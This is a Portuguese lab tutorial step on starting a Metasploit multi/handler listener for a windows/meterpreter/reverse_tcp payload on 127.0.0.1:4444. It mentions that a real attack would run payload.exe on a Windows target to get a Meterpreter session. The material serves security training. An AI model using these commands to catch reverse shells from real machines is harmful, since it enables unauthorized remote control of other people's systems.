Criar um listener no msfconsole para capturar a conexão
Nesta etapa, você configurará um listener para lidar com a conexão do payload que você acabou de criar. Um payload é inútil a menos que você tenha algo do seu lado para "capturar" a conexão reversa que ele faz. Para isso, usaremos o msfconsole, a interface principal do Metasploit Framework.
Primeiro, inicie o msfconsole. Usar o flag -q faz com que ele inicie silenciosamente sem mostrar o banner, o que é mais limpo.
msfconsole -q
Seu prompt mudará para msf6 >. Agora, você precisa configurar um handler para escutar a conexão de entrada. As configurações para o handler devem corresponder exatamente às configurações que você usou para gerar o payload.
-
Use o módulo exploit/multi/handler. Este é um handler genérico para conexões de entrada.
use exploit/multi/handler
-
Defina o payload para corresponder ao que você gerou.
set payload windows/meterpreter/reverse_tcp
-
Defina LHOST para o mesmo endereço IP.
set LHOST 127.0.0.1
-
Defina LPORT para a mesma porta.
set LPORT 4444
-
Finalmente, execute o listener.
run
O msfconsole exibirá agora uma mensagem indicando que o listener foi iniciado.
[*] Started reverse TCP handler on 127.0.0.1:4444
Neste ponto, o listener está ativo e esperando. Em um ataque real, você transferiria payload.exe para um alvo Windows e o executaria. Quando executado, ele se conectaria de volta a este listener, e você obteria uma sessão Meterpreter. Como não temos uma máquina Windows alvo neste laboratório, não veremos uma conexão. O objetivo aqui é aprender o processo completo de geração de um payload e configuração de seu listener correspondente.
Para sair do listener, pressione Ctrl + C. Para sair do msfconsole, digite exit e pressione Enter.
exit